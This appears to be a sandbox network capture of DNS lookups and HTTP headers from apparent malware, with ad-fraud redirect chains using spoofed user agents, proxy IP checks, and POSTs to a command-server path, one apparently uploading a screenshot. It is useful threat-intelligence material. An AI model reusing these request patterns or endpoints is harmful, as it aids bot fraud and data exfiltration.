DNSsecure.gravatar.comRequestsecure.gravatar.comIN AResponsesecure.gravatar.comIN A192.0.73.2
-
DNSt.coRequestt.coIN AResponset.coIN A104.244.42.69t.coIN A104.244.42.5t.coIN A104.244.42.133t.coIN A104.244.42.197
-
DNSbaide.ruRequestbaide.ruIN AResponsebaide.ruIN A5.181.218.143
-
DNSlangke.funRequestlangke.funIN AResponselangke.funIN A212.107.18.203
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://baide.ru/ads.phpRequestGET /ads.php HTTP/1.1
Host: baide.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:51:45 GMT
Content-Length: 57785
Connection: close
-
GEThttp://alfad.pro/go/266933/627598RequestGET /go/266933/627598 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:51:45 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
GEThttp://langke.fun/ads.htmlRequestGET /ads.html HTTP/1.1
Host: langke.fun
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:51:45 GMT
Content-Length: 57786
Connection: close
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:45 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:46 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:47 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:48 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSpetscolect.comRequestpetscolect.comIN AResponsepetscolect.comIN A45.76.17.70
-
DNSxhoney.ruRequestxhoney.ruIN AResponsexhoney.ruIN A178.238.238.213
-
GEThttp://xhoney.ru/index.htmlRequestGET /index.html HTTP/1.1
Host: xhoney.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T230NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:49 GMT
Content-Type: text/html
Content-Length: 168
Last-Modified: Mon, 02 Aug 2021 07:25:28 GMT
Connection: keep-alive
ETag: "61079de8-a8"
Accept-Ranges: bytes
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSyaode.liveRequestyaode.liveIN AResponseyaode.liveIN A212.107.18.203
-
DNSdiabasewoodhouse.xyzRequestdiabasewoodhouse.xyzIN AResponsediabasewoodhouse.xyzIN A34.196.13.28
-
GEThttp://yaode.live/go.htmlRequestGET /go.html HTTP/1.1
Host: yaode.live
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://diabasewoodhouse.xyz/?k=f49372aed150732732fa7ba986f67e91.1630921834.063.2.1.aGVtYWRyb21ldGVyYW5kZGVwb3NpdG9yeS54eXo%3D&r=&z=-480RequestGET /?k=f49372aed150732732fa7ba986f67e91.1630921834.063.2.1.aGVtYWRyb21ldGVyYW5kZGVwb3NpdG9yeS54eXo%3D&r=&z=-480 HTTP/1.1
Host: diabasewoodhouse.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Server: nginx
Date: Mon, 06 Sep 2021 09:51:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: tpp_u=0%3B1631008310; expires=Wed, 08-Sep-2021 09:51:50 GMT; path=/
Set-Cookie: tpp_6561032_l=1034%3B1631008310; expires=Wed, 08-Sep-2021 09:51:50 GMT; path=/
Set-Cookie: tpp_ov=102611%3B1631008310; expires=Wed, 08-Sep-2021 09:51:50 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%3B1631008310; expires=Wed, 08-Sep-2021 09:51:50 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%2C103108%3B1631008310; expires=Wed, 08-Sep-2021 09:51:50 GMT; path=/
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Set-Cookie: tpp_oc=103108%3B1631008310; expires=Wed, 08-Sep-2021 09:51:50 GMT; path=/
Location: http://www.signupandturnyourscreenoffsafepowernow.date/?pcl=IYzlAnRHhIVtCjj0zts8UCRo4spWrXxyXsIAiOEUa2hhVeEOeK24_HxnSd-L5kXGz8q2wAcpExbj--Kqf2P55A..&sid=&subid=103108_36b003b98b8360bd1f2f8d8de735ed78
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627598&t=0e9da7423d169c08&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627598&t=0e9da7423d169c08&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627598
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:51:50 GMT
Location: https://www.onlinecasinoground.nl/blackjack-spelen/
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
GEThttp://alfad.pro/go/266933/627611RequestGET /go/266933/627611 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0 IceDragon/58.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:51:51 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNStmearn.comRequesttmearn.comIN AResponsetmearn.comIN A104.21.13.169tmearn.comIN A172.67.200.218
-
DNSbefuck.ruRequestbefuck.ruIN AResponsebefuck.ruIN A167.86.103.60
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSmignished-sility.comRequestmignished-sility.comIN AResponsemignished-sility.comIN A3.225.140.174
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.89millustry.topIN A13.227.222.110millustry.topIN A13.227.222.73millustry.topIN A13.227.222.102
-
GEThttp://alfad.pro/go/266933/628701RequestGET /go/266933/628701 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.168 Safari/537.36 OPR/51.0.2830.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:51:55 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
GEThttp://millustry.top/redirect?tid=936782RequestGET /redirect?tid=936782 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xmom.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:51:55 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=8157bacf-aee1-44d1-a22d-5aa3d31ebab5
Location: https://xml.bid-engine.com/click?i=7f9m4C6ZoNA_0
X-Cache: Miss from cloudfront
Via: 1.1 f9d671af272d3b5b3c683203ae8f4cc8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: P6MCnVzXh9Rw9_E62hvx3eLuyMyLYjaM_zHT_psTdmZmEGuBZn-Dew==
-
GEThttp://befuck.ru/ad.phpRequestGET /ad.php HTTP/1.1
Host: befuck.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSlenhan.netRequestlenhan.netIN AResponselenhan.netIN A172.67.185.252lenhan.netIN A104.21.0.110
-
DNSv2.zopim.comRequestv2.zopim.comIN AResponsev2.zopim.comIN A104.16.103.139v2.zopim.comIN A104.16.106.139v2.zopim.comIN A104.16.107.139v2.zopim.comIN A104.16.105.139v2.zopim.comIN A104.16.104.139
-
DNSconnect.facebook.netRequestconnect.facebook.netIN AResponseconnect.facebook.netIN CNAMEscontent.xx.fbcdn.netscontent.xx.fbcdn.netIN A31.13.64.21
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:51:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----d877b256604ead499fcbdcf743c0b7b7
Host: 185.215.113.202
Content-Length: 65762
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:51:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
DNSyportal.xyzRequestyportal.xyzIN AResponseyportal.xyzIN A62.171.142.250
-
DNSmsgose.comRequestmsgose.comIN AResponsemsgose.comIN A172.67.176.37msgose.comIN A104.21.48.29
-
DNSonsanothi.bizRequestonsanothi.bizIN AResponseonsanothi.bizIN A52.222.139.9onsanothi.bizIN A52.222.139.108onsanothi.bizIN A52.222.139.29onsanothi.bizIN A52.222.139.93
-
GEThttp://yportal.xyz/bb.phpRequestGET /bb.php HTTP/1.1
Host: yportal.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://onsanothi.biz/redirect?tid=929588RequestGET /redirect?tid=929588 HTTP/1.1
Host: onsanothi.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://teentube.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:09 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:03 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSstats.g.doubleclick.netRequeststats.g.doubleclick.netIN AResponsestats.g.doubleclick.netIN CNAMEstats.l.doubleclick.netstats.l.doubleclick.netIN A173.194.69.155stats.l.doubleclick.netIN A173.194.69.154stats.l.doubleclick.netIN A173.194.69.156stats.l.doubleclick.netIN A173.194.69.157
-
DNSwww.facebook.comRequestwww.facebook.comIN AResponsewww.facebook.comIN CNAMEstar-mini.c10r.facebook.comstar-mini.c10r.facebook.comIN A31.13.71.36
-
DNSstatic.zdassets.comRequeststatic.zdassets.comIN AResponsestatic.zdassets.comIN A104.18.70.113static.zdassets.comIN A104.18.72.113
-
DNSpartner.googleadservices.comRequestpartner.googleadservices.comIN AResponsepartner.googleadservices.comIN CNAMEpartnerad.l.doubleclick.netpartnerad.l.doubleclick.netIN A216.58.208.98
-
DNSwww.googletagservices.comRequestwww.googletagservices.comIN AResponsewww.googletagservices.comIN A172.217.168.194
-
DNSadservice.google.nlRequestadservice.google.nlIN AResponseadservice.google.nlIN CNAMEpagead46.l.doubleclick.netpagead46.l.doubleclick.netIN A142.250.179.130
-
DNSwww.google.nlRequestwww.google.nlIN AResponsewww.google.nlIN A142.251.36.3
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSxml.bid-engine.comRequestxml.bid-engine.comIN AResponsexml.bid-engine.comIN CNAMEad-maven.xml.ak-is2.netad-maven.xml.ak-is2.netIN A198.134.116.29
-
DNSjpteen.usRequestjpteen.usIN AResponsejpteen.usIN A207.180.237.38
-
DNSwww.arminius.ioRequestwww.arminius.ioIN AResponsewww.arminius.ioIN A104.21.71.33www.arminius.ioIN A172.67.142.200
-
GEThttp://alfad.pro/go/266933/622594RequestGET /go/266933/622594 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:52:06 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
GEThttp://jpteen.us/index.htmlRequestGET /index.html HTTP/1.1
Host: jpteen.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:05 GMT
Content-Type: text/html
Content-Length: 267
Last-Modified: Fri, 28 May 2021 07:00:36 GMT
Connection: keep-alive
ETag: "60b09514-10b"
Accept-Ranges: bytes
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://alfad.pro/ad/ad?p=266933&w=622367&t=dde1cb5a18102026&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=622367&t=dde1cb5a18102026&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/622367
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:52:06 GMT
Location: https://www.fpcpopunder.com/popunder/popunder.cgi?program=light&account=pub_fpc_popcash&track=A
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSekr.zdassets.comRequestekr.zdassets.comIN AResponseekr.zdassets.comIN A104.18.72.113ekr.zdassets.comIN A104.18.70.113
-
DNSencrypted-tbn3.gstatic.comRequestencrypted-tbn3.gstatic.comIN AResponseencrypted-tbn3.gstatic.comIN A172.217.168.238
-
DNSencrypted-tbn2.gstatic.comRequestencrypted-tbn2.gstatic.comIN AResponseencrypted-tbn2.gstatic.comIN A216.58.214.14
-
DNSencrypted-tbn0.gstatic.comRequestencrypted-tbn0.gstatic.comIN AResponseencrypted-tbn0.gstatic.comIN A172.217.168.206
-
DNSssl.gstatic.comRequestssl.gstatic.comIN AResponsessl.gstatic.comIN A142.250.179.131
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:09 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSadmin.bitninja.ioRequestadmin.bitninja.ioIN AResponseadmin.bitninja.ioIN CNAMEapi.bitninja.ioapi.bitninja.ioIN A148.72.132.201api.bitninja.ioIN A148.72.132.217api.bitninja.ioIN A148.72.132.215api.bitninja.ioIN A148.72.132.216
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSlangmm.infoRequestlangmm.infoIN AResponselangmm.infoIN A5.181.218.143
-
DNSmaswo.ruRequestmaswo.ruIN AResponsemaswo.ruIN A212.107.18.203
-
DNSwatchav.xyzRequestwatchav.xyzIN AResponsewatchav.xyzIN A194.59.164.58
-
GEThttp://alfad.pro/ad/ad?p=266933&w=629202&t=d0e20659c11d19e9&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=629202&t=d0e20659c11d19e9&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/629202
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:52:12 GMT
Location: https://www.fpcpopunder.com/popunder/popunder.cgi?program=light&account=pub_fpc_popcash&track=A
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/628928RequestGET /go/266933/628928 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:52:12 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://morenews.us/index.htmlRequestGET /index.html HTTP/1.1
Host: morenews.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MATBJS; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:11 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Thu, 26 Aug 2021 08:28:46 GMT
Connection: keep-alive
ETag: "612750be-108"
Accept-Ranges: bytes
-
GEThttp://maswo.ru/adv.htmlRequestGET /adv.html HTTP/1.1
Host: maswo.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:52:12 GMT
Content-Length: 57786
Connection: close
-
GEThttp://watchav.xyz/goad.phpRequestGET /goad.php HTTP/1.1
Host: watchav.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 YaBrowser/18.4.1.871 Yowser/2.5 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:52:12 GMT
Content-Length: 57786
Connection: close
-
GEThttp://alfad.pro/go/266933/628701RequestGET /go/266933/628701 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
